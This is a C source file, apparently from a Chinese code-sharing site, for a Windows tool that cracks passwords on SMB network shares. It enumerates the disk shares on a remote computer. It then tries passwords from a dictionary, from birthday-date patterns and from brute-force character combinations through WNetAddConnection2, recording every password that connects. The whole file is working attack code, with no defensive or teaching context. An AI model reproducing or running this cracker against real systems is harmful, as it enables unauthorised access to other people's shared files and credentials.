📄 crackpwd.c
字号:
#include "CrackPwd.h"
#include "stdio.h"
UINT uCrackMode;FILE * fDictionary;
char * szCharSet,sz_CharSet[256];
int * iCurPwd,i_CurPwd[MAX_PWD_LEN+1];
int nCharSetLen;
int nMaxPwdLen,nCurPwdLen;
char szPwdShot[MAX_PWD_LEN+1];
int nResources,nCracked;
int iCurResource,nNewPwd;
int iStartYear,iEndYear;
int iCurYear,iCurMonth,iCurDay;
int iYearFmt,iMonthFmt,iDayFmt;
CrackResource * Resources;
int GetMonthDays(int iYear,int iMonth)
{
int iMonthDays[12]={31,28,31,30,31,30,31,31,30,31,30,31};
if(iMonth!=2)
return iMonthDays[iMonth-1];
else if(iYear%4)
return 28;
else if(iYear%100)
return 29;
else if(iYear%400)
return 28;
else
return 29;
}
int GetBirthdayPwd(char * szDestPwd)
{
if(iCurYear>iEndYear)
return 1;
if(iYearFmt)
{
wsprintf(szDestPwd,"%d",iCurYear);
szDestPwd+=4;
}
else
{
wsprintf(szDestPwd,"%d",iCurYear%100);
szDestPwd+=2;
}
if(iCurMonth<10)
{
if(iMonthFmt)
{
strcpy(szDestPwd,"0");
szDestPwd++;
}
wsprintf(szDestPwd,"%d",iCurMonth);
szDestPwd++;
}
else
{
wsprintf(szDestPwd,"%d",iCurMonth);
szDestPwd+=2;
}
if(iCurDay<10)
{
if(iCurMonth>9)
iDayFmt=1;
if(iDayFmt)
{
strcpy(szDestPwd,"0");
szDestPwd++;
}
wsprintf(szDestPwd,"%d",iCurDay);
szDestPwd++;
}
else
{
wsprintf(szDestPwd,"%d",iCurDay);
szDestPwd+=2;
}
if((!iDayFmt)&&(iCurDay<10))
{
iDayFmt=1;
return 0;
}
iDayFmt=0;
if((!iMonthFmt)&&(iCurMonth<10))
{
iMonthFmt=1;
return 0;
}
iMonthFmt=0;
if(iYearFmt=1-iYearFmt)
return 0;
if(iCurDay<GetMonthDays(iCurYear,iCurMonth))
{
iCurDay++;
return 0;
}
iCurDay=1;
if(iCurMonth<12)
{
iCurMonth++;
return 0;
}
iCurMonth=1;
return (++iCurYear)>iEndYear;
}
int GetBrouteforcePwd(char * szDestPwd)
{
int * nCurChar,iCurPwdLen,iResult=0,iLoop=0;
if(nCurPwdLen==0)
{
nCurPwdLen=1;
i_CurPwd[1]=1;
}
else if(nCurPwdLen>MAX_PWD_LEN)
{
return 1;
}
else
for(iCurPwdLen=nCurPwdLen;iCurPwdLen>0;iCurPwdLen--)
{
nCurChar=&(i_CurPwd[iCurPwdLen]);
if(*nCurChar<nCharSetLen)
{
(*nCurChar)++;
break;
}
else if(iCurPwdLen>1)
{
*nCurChar=1;
}
else if(nCurPwdLen<nMaxPwdLen)
{
*nCurChar=1;
nCurPwdLen++;
i_CurPwd[nCurPwdLen]=1;
}
else
{
nCurPwdLen=MAX_PWD_LEN+1;
return 1;
}
}
for(iLoop=1;iLoop<=nCurPwdLen;iLoop++)
szDestPwd[iLoop]=sz_CharSet[i_CurPwd[iLoop]];
szDestPwd[iLoop]=0;
return 0;
}
int GetNextPwd(char * szPwd,char * szResource,int * iCurCrack)
{
int iNextResource,nNextPwd;
if(nCracked==nResources)
return 2;
while(((Resources[iCurResource]).szPwd)[0])
{ if(iCurResource<nResources-1)
iCurResource++;
else
{
iCurResource=0;
nNewPwd=1;
}
}
*iCurCrack=iCurResource;
strcpy(szResource,(Resources[iCurResource]).szRemoteResource);
if(iCurResource<nResources-1)
{
iNextResource=iCurResource+1;
nNextPwd=0;
}
else
{
iNextResource=0;
nNextPwd=1;
}
if(!nNewPwd)
{
strcpy(szPwd+1,szPwdShot);
goto ReturnPassword;
}
if(uCrackMode&USINGDICTIONARY)
{
if(fscanf(fDictionary,"%s",szPwd+1)!=EOF)
{
goto ReturnPassword;
}
else
uCrackMode&=~USINGDICTIONARY;
}
if(uCrackMode&USINGBIRTHDAY)
{
if(!GetBirthdayPwd(szPwd+1))
{
goto ReturnPassword;
}
else
uCrackMode&=~USINGBIRTHDAY;
}
if(uCrackMode&BROUTEFORCING)
{
if(!GetBrouteforcePwd(szPwd))
{
goto ReturnPassword;
}
else
uCrackMode&=~BROUTEFORCING;
}
return 1;
ReturnPassword:
strcpy(szPwdShot,szPwd+1);
iCurResource=iNextResource;
nNewPwd=nNextPwd;
return 0;
}
DWORD WINAPI Crack(SmbCrackStruct * pCrackStruct)
{
NETRESOURCE NetRes;
char * szCurPwd,sz_CurPwd[MAX_PWD_LEN+2];
char szUserName[20],szRemote[100];
int iResult,iCurCrack;
strcpy(szRemote,pCrackStruct->szRemoteResource);
strcpy(szUserName,pCrackStruct->szUserName);
szCurPwd=sz_CurPwd+1;
memset(sz_CurPwd,0,sizeof(sz_CurPwd));
NetRes.dwType=RESOURCETYPE_DISK;
NetRes.lpLocalName=NULL;
NetRes.lpRemoteName=szRemote;
NetRes.lpProvider=NULL;
while(1)
{
if(WaitForSingleObject(pCrackStruct->hStopCrack,0)==WAIT_OBJECT_0)
{
PostMessage(pCrackStruct->hParentWindow,
pCrackStruct->hCrackDone,CANCELED,0);
ExitThread(CANCELED);
}
EnterCriticalSection(&(pCrackStruct->csCurPwd));
iResult=GetNextPwd(sz_CurPwd,szRemote,&iCurCrack);
LeaveCriticalSection(&(pCrackStruct->csCurPwd));
if(!iResult)
{
iResult=WNetAddConnection2(&NetRes,szCurPwd,
szUserName,0);
if(iResult==NO_ERROR)
{
iResult=WNetCancelConnection2(NetRes.lpRemoteName,
CONNECT_UPDATE_PROFILE,TRUE);
EnterCriticalSection(&((Resources[iCurCrack]).csCracked));
if(!((Resources[iCurCrack]).szPwd)[0])
{
nCracked++;
strcpy((Resources[iCurCrack]).szPwd,szCurPwd);
PostMessage(pCrackStruct->hParentWindow,
UM_CRACKOUT,(LONG)(&(Resources[iCurCrack])),0);
}
LeaveCriticalSection(&((Resources[iCurCrack]).csCracked));
}
}
else if(iResult==2)
{
SetEvent(pCrackStruct->hStopCrack);
PostMessage(pCrackStruct->hParentWindow,
pCrackStruct->hCrackDone,CRACKED,0);
ExitThread(CRACKED);
}
else
{
SetEvent(pCrackStruct->hStopCrack);
PostMessage(pCrackStruct->hParentWindow,
pCrackStruct->hCrackDone,NOPASSWORD,0);
ExitThread(NOPASSWORD);
}
}
return 0;
}
DWORD WINAPI Enum(EnumStruct * pEnumStruct)
{
HANDLE hEnum;
NETRESOURCE EnumNetRes,* pNetRes;
DWORD dResourceCount,dBufferSize;
EnumNetRes.dwUsage=RESOURCEUSAGE_CONTAINER;
EnumNetRes.lpRemoteName=pEnumStruct->szRemoteComputer;
EnumNetRes.lpProvider=NULL;
if(WNetOpenEnum(RESOURCE_GLOBALNET,RESOURCETYPE_DISK,
RESOURCEUSAGE_CONNECTABLE,&EnumNetRes,&hEnum)==NO_ERROR)
{
pNetRes=(NETRESOURCE *)pEnumStruct->ResourceBuffer;
dResourceCount=1;
dBufferSize=sizeof(pEnumStruct->ResourceBuffer);
while(WNetEnumResource(hEnum,&dResourceCount,
&(pEnumStruct->ResourceBuffer),&dBufferSize)==NO_ERROR)
{
PostMessage(pEnumStruct->hParentWindow,
pEnumStruct->hEnumOut,1,(LONG)pEnumStruct);
while((pNetRes->lpRemoteName)[0]);
}
WNetCloseEnum(hEnum);
}
PostMessage(pEnumStruct->hParentWindow,
pEnumStruct->hEnumOut,0,(LONG)pEnumStruct);
ExitThread(0);
return 0;
}⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -